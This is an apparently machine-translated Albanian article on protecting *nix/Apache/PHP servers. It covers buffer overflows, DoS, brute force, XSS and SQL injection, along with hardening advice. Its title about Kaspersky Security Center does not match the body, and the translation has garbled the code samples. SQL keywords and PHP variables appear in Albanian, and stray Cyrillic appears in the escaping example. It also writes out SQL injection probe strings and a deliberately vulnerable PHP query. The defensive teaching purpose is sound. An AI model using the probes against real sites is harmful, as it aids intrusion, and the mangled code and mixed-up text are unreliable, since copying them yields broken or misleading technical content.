Vendosja e mbrojtjes antivirus përmes Kaspersky Security Center. Konfigurimi i mbrojtjes antivirus Shumë kohë


Në këtë artikull, unë do të doja të mbledh disa lloje të sulmeve ndaj serverëve dhe mjeteve të mbrojtjes së serverit nga hakerat. Janë shkruar shumë libra dhe artikuj mbi temën e sigurisë. Theksi i këtij artikulli është në gabimet themelore të administratorëve dhe zgjidhjet për eliminimin e tyre. Pas leximit të këtij artikulli dhe kontrollit të serverit të tij, administratori gjithashtu nuk do të jetë në gjendje të flejë i qetë, ai mund të thotë vetëm se kam kaluar "minimumin e kandidatit".

Mos harroni administratorët tre fjalë të urta,
Jo! më mirë printojini dhe varni në vendin tuaj të punës para syve:
"Siguria është një proces",
"Kur administratori nuk ka çfarë të bëjë, ai është i angazhuar në siguri",
"Siguria përcaktohet nga hallka më e dobët"
Artikulli synon administratorët *nix + Apache + PHP + Perl + (MySQL | PostgreSQL) dhe mbrojtjen e serverëve nga sulmet në distancë, për administratorët e tjerë, shpresoj se artikulli do të jetë ushqim për mendim.
Libra të ndryshëm kanë klasifikime të ndryshme të sulmeve të hakerëve, unë do të prezantoj ndarjen time në dy klasa të kushtëzuara të TË GJITHA sulmeve, do t'i çgrupoj ato:

  • Sulmi ndaj shërbimeve që janë të cenueshme dhe të aksesueshme nëpërmjet internetit

Për të kuptuar ndarjen time, imagjinoni se ekziston një skenar imagjinar që sulmon nga distanca Apache në portin 80 dhe, si rezultat i sulmit, Apache mbyllet dhe ju mbeteni pa faqen tuaj, pasi nuk ka njeri që të japë faqet e internetit. Serverit tuaj të postës sendmail iu dërguan 1000 karaktere në vend të një emri të shkurtër përdoruesi si parametër në VRFY, sendmail nuk e priste që të ndodhte kjo dhe u mbyll duke ju lënë pa postë. Kuptimi i përgjithshëm i sulmeve të kësaj klase të kushtëzuar është që disa dobësi të aplikacionit janë shfrytëzuar. Dhe ka tre mënyra -

  • rruga 1) aplikacioni do të rrëzohet dhe shërbimi nuk do të jetë i disponueshëm, situata DoS;
  • rruga 2) aplikacioni do të fillojë të kap burimet dhe, pasi t'i varfërojë ato, do të bëjë një DoS;
  • rruga 3) aplikacioni do të futet me një kod shell dhe kodi i sulmuesit do të ekzekutohet;

Të gjitha këto janë sulme ndaj shërbimit (pika 1) dhe ato trajtohen vetëm në një mënyrë: administratori mëson menjëherë nga zhvilluesi për praninë e një cenueshmërie dhe përditëson këtë program.

Sulmi në pikën 2 është kur një shërbim dinamik i zbatuar në disa gjuhë programimi lejon marrjen e parametrave dhe i ekzekuton ato pa i kontrolluar ato. Për shembull, duke përdorur një shfletues, një sulmues, duke u zvarritur nëpër një faqe Apache, kërkon dobësi në vetë sajtin dhe duke i shfrytëzuar ato, merr atë që dëshiron. I shkruar në Tcl, boti për moderimin e kanalit të serverit IRC merr kërkesa nga përdoruesi (numri i një shakaje të re, data e ditës për shfaqjen e motit) dhe hakeri, duke rikrijuar punën e kodit të programit të botit (inxhinieri e kundërt ), ndërton kërkesa që nuk janë marrë parasysh nga autori i botit.

Pyete si është? atëherë ju duhet patjetër ky artikull. Në një mënyrë apo tjetër, pak më poshtë gjithçka do të lyhet.

Sulmi ndaj shërbimeve të cenueshme dhe vetë serverit

Në këtë seksion, unë përfshiva të gjitha sulmet, ndikimi i të cilave bie mbi sistemin dhe shërbimet. Shpesh sulme të tilla janë të mundshme nga gabimet në zbatimin e programit, të tilla si tejmbushjet e buferit (mbushja e bufferit). Me pak fjalë, duket kështu, le të themi në një server ftp të shkruar keq ka një grup (buffer) për një emër përdoruesi për një numër të caktuar karakteresh (për shembull, 10), dhe një server i tillë ftp merr 100 karaktere nga një i sëmurë -dëshirues, nëse një situatë e tillë nuk është në kodin e serverit ftp të kontrolluar, ndodh një tejmbushje buferi.

Pra, çfarë është një tejmbushje e tamponit lokal i dobishëm për hakerat? Është e mundur të mbishkruash adresën e kthimit me kod me qëllim të keq. Nga distanca, kjo ju lejon të ekzekutoni kodin arbitrar në sistemin e synuar, në nivel lokal, nëse programi funksionon si rrënjë, do t'ju lejojë të fitoni privilegje të administratorit të sistemit. Kodi që shkakton një tejmbushje buferi dhe kryen veprime për një haker quhet shell kodi Shkrimi i shellcode nuk është një detyrë e lehtë dhe kërkon njohuri të gjuhës assembly nga hakeri, gjë që nënkupton profesionalizëm në këtë fushë.

Mbrojtje kundër sulmeve ndaj shërbimeve të cenueshme dhe vetë serverit

  • Përditëso. Është e nevojshme të mësoni se si të përditësoni të gjithë sistemin dhe për këtë arsye të jeni në gjendje
    "ndërtoni botën dhe kernelin" për *nix, përditësoni përmes sistemit të paketës Linux dhe mund të klikoni butonin Përditëso në Windows Update për MS Windows të licencuar. Administratorët e FreeBSD duhet të jenë në gjendje të instalojnë softuer duke përdorur portet. Në këtë mënyrë ju do të lundroni me zhvilluesit, jo kundër tyre.

    Administratorët e MS Windows duhet të mësohen dhe të përdorin më shpesh formatin e shpërndarjes MSI, i cili rekomandohet shumë nga Microsoft dhe mbështet përditësimin e paketës së vjetër me atë të re. Çfarëdo që të bëni në serverin tuaj, pyesni veten nëse ka një version të ri të këtij programi, sa e lehtë është ta përditësoni atë? Ju duhet të krijoni një zgjidhje mbi të cilën keni kontroll të plotë, po, ka projekte me zhvillimet ose arnimet e tyre, por nëse zhvillimet tuaja kërkojnë ngrirjen e aplikacioneve që ju nevojiten në një version të caktuar dhe nuk mund të aplikoni arnimet tuaja në sistemin e ri - një zgjidhje e tillë NUK vlen!

    Do të bëj një digresion lirik këtu dhe do t'ju tregoj se si u desh të thyeja veten. Pasi të keni lexuar artikujt në internet që zakonisht fillojnë kështu, "shkarkoni burimin dhe vendoseni të instaloni". Pra, çfarë është më pas? Si do ta instaloni versionin e ri? Të ruhet versioni i vjetër që të mund të (ç|ç)instalohet në të? Dhe në të ri make install përsëri? Këto pyetje u bënë nga miku im Dmitry Dubrovin kur filluam të mësojmë FreeBSD. Fillova të kuptoj që ai kishte të drejtë, dhe të paktën për Falas, kjo rrugë nuk është e përshtatshme dhe duke mos ndjekur rrugën e zhvilluesve të FreeBSD, vetëm sa i bëra gjërat më të vështira për veten time.

    Tani, pasi të keni zotëruar FreeBSD, kur disa komanda shkarkojnë burime të reja për kernelin Falas dhe të gjithë sistemin, atëherë krijohen disa komanda botë e re dhe kerneli, dhe më pas portat dhe aplikacionet në sistem përditësohen, ju filloni të kuptoni fuqinë e sistemeve * nix. Është e vështirë të përcjellësh krenarinë që ndjen kur përmirëson një server me FreeBSD nga një degë e vjetër në atë aktuale, rindërton botën e sistemit, kur sistemi përpilohet nga burime të reja (duket sikur Munchausen e tërhoqi veten për flokë) dhe gjithçka. që funksiononte para azhurnimit funksionon gjithashtu "pa skedar".

    Siç e keni kuptuar tashmë, duhet të regjistroheni në listat e postimeve të sigurisë nga zhvilluesit e softuerit që mbështet biznesin tuaj dhe të përditësoheni periodikisht. Përtëritja e gjithçkaje dhe e gjithçkaje duhet të përsoset dhe të vihet në shina.

  • Akordimi i sigurisë. Shumica e sistemeve operative të serverëve nuk janë mjaftueshëm të konfiguruar, si parazgjedhje, për të punuar në mjedisin e ashpër "kimik" të internetit. Në mënyrë që hakerët të "mos mashtrojnë" në serverin tuaj, duhet të kryeni akordim të sigurisë, domethënë të lexoni rekomandimet e prodhuesit të sistemit operativ për sigurinë. Administratorët e *nix systems mund ta quajnë njeriun e sigurisë dhe, pasi të lexojnë këshillat e zhvilluesve, ta bëjnë përrallën realitet. Por cilido qoftë sistemi operativ, duhet të testoni me kujdes funksionimin e serverit dhe shërbimeve pas akordimit të sigurisë.
  • muri i zjarrit. Një mur zjarri i konfiguruar që e keni kontrolluar personalisht duke përdorur skanerët e portave nmap dhe skanerët e cenueshmërisë, nëse ka një dalje nga këto programe, a e kuptoni të gjithë se çfarë është në rrezik? Kur vendosni një mur zjarri, mbani mend se ka mënyra për të anashkaluar rregullat e tij. Për shembull, ekziston një rrjet lokal i mbrojtur nga një mur zjarri, duke vendosur flamurin e ndalimit të fragmentimit të paketave, është e mundur, në situata të caktuara, të arrihet në destinacionin në rrjetin lokal të zonës. Ose një gabim i zakonshëm i administratorit, besimi i tepruar në paketat dalëse të serverit të tij.

    Imagjinoni situatë reale, kodi i armikut po përpiqet të iniciojë një lidhje me hostin e hakerit pritës dhe ju keni një rregull të murit të zjarrit "çdo gjë lejohet nga unë në internet". Kur hartoni rregullat e murit të zjarrit, duhet të kuptoni plotësisht pamjen e plotë të komunikimit të rrjetit të shërbimeve tuaja midis tyre dhe klientëve të largët.

  • Sistemi i zbulimit të ndërhyrjeve. Firewall mund të imagjinohet si mure guri pranë kështjellës së një kalorësi. Ngritur një herë dhe ulen brenda - e thatë dhe e rehatshme. Por, çka nëse dikush tashmë po teston forcën e mureve nga topi? Ndoshta ju duhet të shikoni nga kështjella dhe të grumbulloni dikë? Për të ditur se çfarë po ndodh pas mureve të kështjellës, atyre jashtë, duhet të keni një sistem zbulimi të ndërhyrjeve (IDS) në server. Nëse keni një sistem të tillë bazuar në paketën që ju pëlqen, atëherë nëse dikush fillon të qëllojë nga arma nmap, atëherë do të jeni të vetëdijshëm dhe sulmuesi gjithashtu do të jetë i vetëdijshëm për "çfarë dini".
  • Analiza e situatave jo standarde. Në regjistrat e shumtë në sistem, mbishkrimet "gabim: nuk hapet skedari /etc/passwd" ose "qasja e mohuar" shpesh pulsojnë. Këto janë kambana të vogla që bien për një aplikacion të konfiguruar gabimisht që nuk mund të lexojë diçka, diku, ose ndoshta nuk është një zile, por një alarm që jep alarmin për një haker që është në gjysmë të rrugës.

    Në çdo rast, administratori duhet të jetë i vetëdijshëm për gjëra të tilla. Për të lehtësuar punën e administratorit, janë krijuar programe që do të analizojnë regjistrat për shfaqjen e frazave interesante dhe do t'i dërgojnë një raport administratorit me postë. Mos e përbuzni një mundësi të tillë, programe të tilla janë të krahasueshme me rojet që kontrollojnë në një rrugë të besuar, por a sillen të gjithë siç është përshkruar?

  • Hiqni versionet e softuerit. Hiqni banderolat nga shërbimet tuaja. Jo, jo ato banderola që shfaqni në faqen tuaj, por ato rreshta që programet tuaja japin në përshëndetje kur lidheni ose në daljen e gabimeve. Nuk ka nevojë të shkëlqeni me versionet e programeve tuaja, hakerët kërkojnë në internet programe të disponueshme që shfrytëzojnë këtë apo atë dobësi (shfrytëzimi - shfrytëzimi) sipas versioneve.

    Këtu nuk ka asnjë zgjidhje të vetme, për shembull, nëse instaloni një program të caktuar nga portet, atëherë mos shkruani make install clean, kështu që pa ju gjithçka do të shkarkohet, përpilohet dhe instalohet. Më mirë të bëjë të marr; bëni ekstrakt; pastaj shkoni te nëndirektoria e skedarëve dhe aty mund të korrigjoni versionin e programit në burime ose ta kaloni atë si një tjetër dhe pastaj vetëm ta bëni instalimin të pastër.

    Apache është shumë informues jashtë vendit dhe ende shkëlqen me versionet e sistemit, PHP, Perl, OpenSSL. Turpi çaktivizohet duke specifikuar direktivat në httpd.conf ServerSignature Off ServerTokens Prod. Në internet mund të gjeni ndihmë për zëvendësimin e banderolave ​​me çdo program. Qëllimi është i njëjtë - të privoni sulmuesin nga informacioni i vlefshëm. Duke parë listën tuaj të shërbimeve të disponueshme nga Interneti, pyesni veten nëse ai jep shumë informacion për veten dhe informacionin që ruan.

    Për shembull, lidhja e serverit DNS mund të lejojë "transferimin e zonës" dhe kompjuterët tuaj me IP dhe emrat e tyre të domenit do të jenë të disponueshëm për të gjithë, gjë që është e keqe. Kontrolloni serverin tuaj me skanerë të ndryshëm dhe lexoni me kujdes rezultatet e tyre. Kur zëvendësoni banerin e programit, ju këshilloj të futni jo tekst të rastësishëm, por një paralajmërim për përgjegjësinë dhe se veprimet janë regjistruar. Meqenëse pati incidente kur një haker u lirua në sallën e gjyqit, sepse në serverin e hakuar FTP kishte një mbishkrim "Mirë se erdhe! Mirë se erdhe!".

  • Rregulli i kërkesës minimale. Minimizoni shërbimet e disponueshme për internetin. Çaktivizoni atë që nuk ju nevojitet, pasi nuk mund të hakoni atë që është me aftësi të kufizuara. Gabim i zakonshëm, për shembull, kur serveri MySQL, i çiftuar me Apache në të njëjtën makinë, është konfiguruar të jetë i aksesueshëm nga distanca në portin e tij standard 3306. Pse? Jep komandën netstat -na | grep DËGJO dhe jepi vetes përgjigjen: a e dini se cilat programe përdorin cilën ndërfaqe dhe cilën port? A jeni në kontroll? Epo nëse po.
  • Shumë fjalëkalime të forta dhe të ndryshme. Shpesh në videot mbi hakimet ose historitë e hakerëve për hakerimin, pulson shprehja "është mirë që administratori kishte një fjalëkalim për panelin e administratorit, i cili gjithashtu shkoi në ssh dhe ftp". Shpresoj se kjo nuk ka të bëjë me ju. Prandaj rregulli: fjalëkalimet për shërbime të ndryshme duhet të jenë të ndryshme dhe të paktën 16 karaktere të gjata. Le të shkruhen në një copë letër nëse keni frikë të harroni (në këtë vend më vrasin specialistët e sigurisë), por kjo është më mirë sesa fjalëkalimi juaj të deshifrohet brenda pak minutash nga një sulmues i largët, pasi gjatësia e vogël e fjalëkalimi dhe ngjashmëria me një fjalë fjalori e bënë të mundur.

    Fjalëkalimet e ndryshme për shërbime të ndryshme janë të lehta për t'u bërë nëse shërbimet nuk autorizojnë si përdorues të sistemit në bazën e të dhënave /etc/passwd, por si virtual në bazat e tyre të të dhënave planare ose DBMS. Mos ruani fjalëkalime në serverë në skedarin password.txt për të gjitha burimet në të cilat ju, si administrator, keni akses.

  • Kufizimi. Të gjitha shërbimet tuaja në server duhet të ekzekutohen nga llogari të ndryshme të kufizuara (llogari) dhe të mos ekzekutohen kurrë nga llogaria rrënjësore. Më besoni, nëse ata arrijnë në përshkallëzimin e privilegjeve nga një llogari e kufizuar në statusin rrënjë (uid=0, gid=0), do të shpëtoheni nga mungesa e vrimave të njohura në sistemin tuaj të përditësuar.

    Nga rruga, shumë administratorë harrojnë një gjë të tillë, pse, për shembull, llogaritë për ekzekutimin e Apache dhe MySQL duhet të kenë akses në guaskë! Në fund të fundit, kjo mund të çaktivizohet dhe në vend të guaskës të specifikoni / bin / false. Epo, sinqerisht, kontrolloni llogaritë tuaja për programe në serverin tuaj të raportimit dhe më tregoni nëse e kam gabim. Në bazat e të dhënave tuaja SQL, kufizoni llogaritë në privilegjet minimale të kërkuara. Mos i jepni privilegje FILE kur thirret vetëm SELECT.

  • Të gjithë në burg! Mësoni se si të punoni me sandbox (sandbox) ose burgje (burg) dhe të ekzekutoni aplikacione në këto dhoma të izoluara, kjo do ta bëjë të vështirë hakimin e të gjithë serverit. Nëse përdorni virtualizimin, atëherë mund t'i shpërndani shërbimet nëpër sisteme të ndryshme operative të ftuar.
  • Mbrojtje me shtresa.Është e mundur të ndaloni diçka në disa mënyra në vende të ndryshme - bëjeni. KURRË mos mendo - e kam ndaluar këtu, atje të ndalojmë të tepërt.

Mësoni më shumë rreth sulmeve ndaj shërbimeve të cenueshme dhe vetë serverit.

  • Sulmi DoS (Mohimi i Shërbimit) - një sulm qëllimi i të cilit është të vrasë çdo burim të kufizuar të serverit (kanal interneti, RAM, procesor, etj., etj.) në mënyrë që serveri të mos mund t'u shërbejë përdoruesve të ligjshëm. Në mënyrë figurative, imagjinoni që një njeri i bezdisshëm ju thirri në shtëpi dhe heshti në telefon, dhe kjo vazhdoi gjatë gjithë mbrëmjes. Jeni lodhur nga e gjithë kjo dhe e keni fikur telefonin dhe në mëngjes keni kuptuar se keni humbur një telefonatë të rëndësishme nga shefi juaj. Këtu është një analogji nga jeta reale Sulmet DoS.

    Në jetën reale, DoS shpesh duket kështu, për shkak të një gabimi në program, përdorimi i procesorit kërcen dhe qëndron në 100% për një kohë të gjatë, dhe sulmuesi e shfrytëzon periodikisht këtë vrimë në program. Një aplikacion i shkruar keq mund të mbarojë pa RAM. Ose një "bombë postare" në formën e një skedari të ngjeshur shumë në arkiv me shumë karaktere [hapësirë], i cili do të shpaketohet për kontroll nga antivirusi dhe skedari i madh i papaketuar do të vërshojë ndarjen e diskut të ngurtë në server dhe / dhe shkaktojnë rinisjen e serverit.

    Mbrojtja nga sulmi DoS:

    • Përditësimi i një programi që është duke u manipuluar për një sulm DoS
    • Vendosni kuotat e burimeve për llogarinë në të cilën funksionon ky program. *Sistemet nix ju lejojnë të rregulloni përqindjen e përdorimit të CPU, RAM, numrin e proceseve të krijuara, skedarët e hapur, etj. e kështu me radhë.
    • Vendosni regjistrimin në program dhe përpiquni të gjeni sulmuesin-kukullues dhe ta bllokoni atë në murin e zjarrit.
    • Vendoseni programin siç këshillohet nga zhvilluesi, guru, sipas artikujve në internet, nëse e gjeni veten në një situatë të tillë.
  • DDoS (i njëjti DoS, por ju sulmoheni nga disa kompjuterë zombie, të udhëhequr nga
    sulmues). DDoS është shkatërrues dhe ato përdoren vetëm nga ata vandalë që kanë tufa makinash zombie dhe do të kërkojnë para për të ndaluar sulmin ose për të dëmtuar biznesin tuaj në mënyrë që përdoruesit, pa arritur në serverin tuaj, të shkojnë te një konkurrent. Sulmet DDoS nuk përdoren nga hakerat, qëllimi i të cilëve është të hakojnë intelektualisht serverin tuaj, po, po, serveri juaj është një "mister" që ata duan ta "zgjidhin".

    Si të mbroheni nga DDoS? Nëse mbështeteni në forcat dhe mjetet tuaja, atëherë duke automatizuar punën e skripteve, mund të zbuloni adresat IP nga regjistrat e ndryshëm dhe t'i futni ato në rregullat e ndalimit të murit të zjarrit. Kështu, për shembull, autori i artikullit "A ka jetë nën DDoS" ka shkruar shumë artikuj se si ta konfiguroni atë për të minimizuar dëmtimin e DDoS.

    Mbrojtja kundër sulmeve DDoS:

    • Nëse DDoS i drejtohet aplikacionit, përpiquni të gjeni në regjistrat ndryshimin midis sulmuesve dhe përdoruesve legjitimë dhe duke automatizuar me një skript, futeni atë në rregullat e murit të zjarrit në mohim.
    • Nëse DDoS i drejtohet sistemit (për shembull, një sulm mbi protokollin ICMP), duke automatizuar me një skript, shtoni atë në rregullat e murit të zjarrit në mohim
    • Vendosni kuotat e burimeve për llogarinë në të cilën funksionon ky program. * Sistemet nix ju lejojnë të konfiguroni përqindjen e përdorimit të CPU, RAM, numrin e proceseve të krijuara, skedarët e hapur, etj.
    • Vendosni programin siç këshillohet nga zhvilluesi, guru, sipas artikujve në internet, nëse e gjeni veten në një situatë të tillë
    • Kontaktoni ofruesin tuaj në rrjedhën e sipërme për të ndihmuar në çfarëdo mënyre që munden. Shkruani një ankesë për [email i mbrojtur] host_i_rrjeteve_from_attack.domain. Kjo do të ndihmojë për të shkatërruar pjesërisht rrjetin e sulmuesit, le të pësojë dëme, i kushton para. Përjetoni kënaqësi morale.
    • Shikoni mod_security për Apache, është një mjet i shkëlqyeshëm për t'ju ndihmuar në disa situata.
  • Sulmi me fjalëkalim Bruteforce. Këtu nuk duhet të fajësohen vrimat në programe, ato thjesht zgjedhin afërsisht një palë hyrje / fjalëkalim. Ata që u larguan nga serveri me ssh të konfiguruar, por harruan të kufizojnë aksesin nëpërmjet ssh nga IP të caktuara dhe me hyrje të caktuara (direktiva në ssh_config AllowUser), duhet të kenë parë në regjistrat përpjekje për të imponuar brute-forcim të fjalëkalimit mash:password_machine.

    Mbrojtja e fjalëkalimit Bruteforce:

    • Kufizoni numrin e përpjekjeve të pasuksesshme për hyrje/fjalëkalim
    • Nëse aplikacioni lejon, atëherë vendosni një rritje të kohës përpara një përpjekjeje të re hyrje / fjalëkalim.
    • Nëse një rreth i ngushtë njerëzish duhet të punojnë me aplikacionin, krijoni një rregull të tillë dhe kufizoni atë në

Sulmoni përmes përmbajtjes dinamike të shërbimit

Ky lloj sulmi shpesh ndodh në një grup Apache + (PHP | PERL) + (MySQL | PostgreSQL) për botën *nix dhe IIS + ASP + Microsoft SQL Server për botën MS Windows duke përdorur një shfletues të thjeshtë, por kjo është vetëm rast i veçantë, e cila përdoret më shpesh për shkak të popullaritetit të internetit. Në këtë pako, gjuhët e programimit janë ASP, PHP, Perl, SQL, kështu që ato do të përdoren shpesh nga hakerat për të përpiluar dizajnet e tyre shkatërruese.

POR gjëja më e rëndësishme për të kuptuar është se ligamentet e tilla shërbim + përmbajtje dinamike në krye të tyre ka shumë në gjuhë programimi dhe për këtë arsye të gjitha janë nën pushkën e hakerëve. Për shembull, këtu është një listë jo e plotë:

  • Web server + skriptet CGI
  • Një lidhje e lashtë që nuk është më në përdorim - skriptet Apache + PHF (domethënë P H F).
  • Serveri i aplikacionit IIS + ColdFusion
  • Mekanizmi SSI (Përfshin anën e serverit)

Më tej, ne do të flasim kryesisht për hakimet në ueb, por mos harroni se gjithçka e përshkruar më poshtë është e vërtetë për shërbime të tjera + paketa të përmbajtjes dinamike. Fjalët janë të ndryshme, por thelbi është i njëjtë. Sot, hakerët sulmojnë ueb-in me shfletuesin, nesër me klientin R kundër shërbimit Z. Ueb serveri, i lidhur vetë me bazat e të dhënave dhe gjuhë të shumta programimi, është bërë një platformë për sulme të këtij lloji.

Kuptimi i të gjitha sulmeve të këtij lloji është të përpiqeni të ekzaminoni faqen duke përdorur një shfletues për të gjetur gabime në skriptet që i shërbejnë përmbajtjes (përmbajtjes) dinamike të faqes.

Prandaj përfundimi - hakimi i një faqeje përmes një sulmi në ueb, në të cilin ka vetëm faqe statike html që i referohen vetëm njëra-tjetrës, është e PAMUNDUR. Sulmet përmes faqes tuaj të internetit erdhën kur njerëzit donin më shumë ndërveprim dhe e shtuan atë përmes gjuhëve të programimit dhe bazave të të dhënave.

Hakerët që shfletojnë faqen i kushtojnë vëmendje të veçantë skripteve që u kalohet çdo parametër. Por, çka nëse autori i skriptit nuk kontrollon se çfarë saktësisht kalohet si vlerë e parametrit?

Zgjidhje të përgjithshme për administratorin nga sulmet ndaj përmbajtjes dinamike të shërbimit (Uebfaqja si rast i veçantë)

  • Përditëso. Ne kemi folur tashmë për këtë, por nëse përdorni zhvillime të palëve të treta (motorë të forumeve, galerive, bisedave, etj.), Atëherë do të merrni raporte për dobësitë dhe vrimat e arnimit. Mendimi i hakerëve është se nëse portali punon me financat dhe xhiron e tyre, atëherë nuk është e dëshirueshme që një portal i tillë të ketë zhvillimet e dikujt tjetër, përveç atyre të tyre. Natyrisht, kuptohet që zhvillimi i motorëve të tyre për faqen është shkruar nga kodues që dinë të programojnë në mënyrë të sigurt dhe kanë një kuptim të kërcënimeve në internet.
  • Të jetë jo standarde. Në shumë shërbime hakerash, bazat e të dhënave të dobësive, forumi/, galeria/, imazhet/ shtigjet shpesh ndezin. Shumë komode! Njihni administratorin, gjysma e tyre do të rruhet dhe do të pështyjë në faqen tuaj kur faqja juaj nuk është e vendosur në /usr/www, dhe administratori juaj nuk është site.com/admin. Në fund të fundit, nëse nuk jeni standard, atëherë kjo është një fole shtesë në rrotat e një hakeri që sulmon faqen tuaj. Ai do të duhet të shtojë / korrigjojë në bazën e të dhënave / skriptin manual. Por a është një haker gjithmonë i aftë apo i gatshëm ta bëjë këtë? Hakerat e rinj "Script kiddies" patjetër do të tremben larg. Për shembull, këshilla për sigurinë PHP

    # Bëni kodin PHP të duket si llojet e tjera të kodit
    Aplikacioni AddType/x-httpd-php .asp .py .pl
    # Bëni kodin PHP të duket si kode të tipit të panjohur
    Aplikacioni AddType/x-httpd-php .bop .foo .133t
    # Bëni kodin PHP të duket si html
    Aplikacioni AddType/x-httpd-php .html .htm

    Kjo formë sigurie për PHP përmes fshehjes ka disa anë negative me pak kosto. Vetë hakerët, duke përshkruar hakerat e tyre, shkruajnë se ata shkarkojnë të njëjtin softuer që ndodhet në serverin tuaj nga faqja e zhvilluesit dhe shikojnë se me cilat emra / shtigje të paracaktuara të tabelës / funksionon ky apo ai motor. Kuptimi i përgjithshëm i jo standardit është të vononi procesin e hakerimit në mënyrë që hakeri të mos ketë një "blitzkrieg", dhe sa më shumë të tërheqë, aq më shumë ka gjasa që të zbulohet.

  • Hiqni versionet e motorëve dhe skripteve në faqe. Ky është informacion i vlefshëm që një sulmues duhet të privohet nga njohja e versionit që kërkon. zgjidhje gardiane për hakerim. Bëni atë në mënyrë që skriptet tuaja të mos shfaqin gabime në gabime informacione të dobishme, si p.sh.: rruga drejt skriptit ku ndodhi gabimi (problemi i "zbulimit të rrugës") dhe vetë dalja e gabimit.
  • Merrni parasysh nevojën për .htaccess. Prania e skedarëve .htaccess do të thotë që ju mund të anashkaloni opsionet tuaja të vendosura në konfigurimin kryesor të Apache, më besoni, hakerët do ta bëjnë këtë. Nëse çaktivizoni përdorimin e .htaccess me direktivën "AllowOverride None", atëherë do të merrni një përfitim të performancës për Apache, pasi ai nuk do të shikojë të gjitha drejtoritë në rrugën drejt faqes së internetit për secilën kërkesë dhe do të rrisë sigurinë e serveri në internet Apache.

Më shumë rreth sulmeve ndaj përmbajtjes dinamike (Uebfaqja si rast i veçantë)

  • XSS (Cross Site Scripting).
    Skriptimi në faqet e ndryshme quhet XSS, jo CSS, pasi CSS është një akronim i hershëm për "Fletët e stilit Cascading". Sulmet XSS nuk drejtohen kundër serverit, por kundër përdoruesve të atij serveri. Por administratori nuk ka nevojë të gëzohet! Sulmi XSS duket si ky, faqja ka fusha të redaktueshme në faqen e internetit ose parametra të skriptit që nuk filtrohen në ndërtimin e formularit<, >, javascript.

    Hakeri shton kodin në gjuhën e programimit të klientit, zakonisht Java dhe VBScript, në fushat e redaktueshme dhe ky kod bëhet pjesë e faqes HTML. Kur një përdorues viziton një faqe të tillë, shfletuesi i tij analizon faqen dhe ekzekuton këtë kod.
    Çfarë bëjnë hakerat me XSS?

    • Vjedhja e cookies (cookies, buns) - këto skedarë teksti ruajnë informacionin që serveri "ia vendos" përdoruesit për identifikimin e tij të mëvonshëm. Në shembull, nëse krijoni një skedar test.html me këtë përmbajtje (shkruajeni vetë), atëherë kur të ekzekutohet në një shfletues, ai do të nxjerrë XSS.
      I nderuar administrator, pata një gabim në vizitën e sajtit
      Ndihmë

      Por ju mund të shkruani një skenar në Java dhe më seriozisht. Në mënyrë tipike, skriptet e tilla shkruhen në postën e internetit të administratorit dhe, duke përdorur inxhinierinë sociale, përpiqen ta detyrojnë atë të lexojë mesazhin në mënyrë që të marrë cookie-t e tij.

      Nëse nuk ka lidhje me adresën IP dhe masat shtesë të sigurisë në cookies, atëherë ata zëvendësojnë cookies e tyre me skedarët e administratorit dhe përpiqen të futen në panelin e administratorit, i cili nuk kontrollon hyrjen dhe fjalëkalimin dhe identifikon njerëzit vetëm me cookie.

    • Shpërthimi i faqes (deface - zëvendësimi i faqes fillestare të faqes, më shpesh index.html)
    • Trojanizimi i një përdoruesi të largët. Shfrytëzimi i freskët zgjidhet për shfletuesit e përdoruesve dhe kur ata hyjnë në një faqe të cenueshme, bëhet një përpjekje për të infektuar kompjuterin me një Trojan. Nëse përdoruesi ka një antivirus me baza të dhënash të reja të instaluara, atëherë ai do të tregojë shfaqjen e një Trojan në sistem. Dhe faqja juaj do të bjerë në sytë e përdoruesit, mbase ai nuk do të vijë më tek ju.
    • DoS. Me një numër të madh vizitorësh, skripti do të kërkojë gjithashtu më shumë faqe të tjera nga serveri juaj ose nga një tjetër, dikush mund të ketë një DoS.

    Zgjidhja e problemit:

    • Për të bllokuar shkrimin e etiketave html në bazën e të dhënave nga fushat e hyrjes, përdorni konstruksione si htmlspecialchars për PHP, të cilat do të zëvendësojnë< на <, >te >, & te & dhe kështu me radhë
      Shembull,

      $comment = htmlspecialchars ($comment, ENT_QUOTES);
      $query = "fut në librin e të ftuarve
      (emri, vendndodhja, emaili, url, komenti) vlerat
      ("$name", "$location", "$email", "$url", "$comment")";
      mysql_query ($query) ose die(mysql_error());

    • Kontrolloni dhe filtroni në skriptet tuaja të gjithë parametrat që përdoruesi fut dhe i kalohen skriptit përmes shiritit të adresave. Mësoni se si të përdorni siç duhet shprehjet e rregullta për të analizuar të dhënat hyrëse. Për gjuhën tuaj të programimit, gjeni material që ju mëson se si të kodoni në mënyrë të sigurt.
    • Nëse dëshironi të përdorni teknologjinë e cookie-ve në faqen tuaj, ju lutemi lexoni Praktikat tona të Sigurisë së Cookies. Kufizoni veprimet e tyre në kohë dhe sipas adresave IP.
    • Si administrator, jini vigjilentë kur jeni duke u mashtruar nga inxhinieria sociale. Mos harroni për sigurinë e kompjuterit personal pas kompjuterit tuaj të klientit.
  • injeksion SQL. injeksion SQL.
    Kjo sëmundje do të thotë që një parametër i pakontrolluar zëvendësohet në pyetjen SQL që shfaqet në skript. Hakeri gjen skriptet që vuajnë nga injektimi SQL në një mënyrë të thjeshtë, citimi site.com/view.php?id=1" i jepet vlerës së parametrit, ose parametri numerik modifikohet si ky site.com/view.php? id=2-1.

    Nëse citati i zëvendësuar shkakton një "gabim" (shumë mesazhe që një kërkesë e tillë nuk ekzekutohet në një skenar të tillë përgjatë një rruge të tillë), atëherë një skenar i tillë është një kandidat për ta pompuar më tej. Shpesh, sulmuesit përdorin hakimin e Google, duke i kërkuar motorit të kërkimit diçka si kjo "site: www.victim.ru Paralajmërim". Motori i kërkimit Google do të kthejë skriptet e pasakta në faqen tuaj, aq të lashta sa janë indeksuar prej kohësh nga merimanga Google .

    Kod që nuk kontrollon vlerën dhe vuan nga injektimi SQL

    $id = $_KËRKESË["id"];
    $rezultat = mysql_query("ZGJIDHni titullin, tekstin, datën e lajmeve, autorin FROM `news` WHERE `id`="$id"");

    Tani imagjinoni që në vend të një numri, do të zëvendësoheni "-1 union zgjidhni null/*" (pa thonjëza) dhe më pas pyetja juaj do të kthehet në

    ZGJIDH titullin, tekstin, datën e lajmeve, autorin FROM `news` WHERE `id`="-1 union zgjidhni null/*"

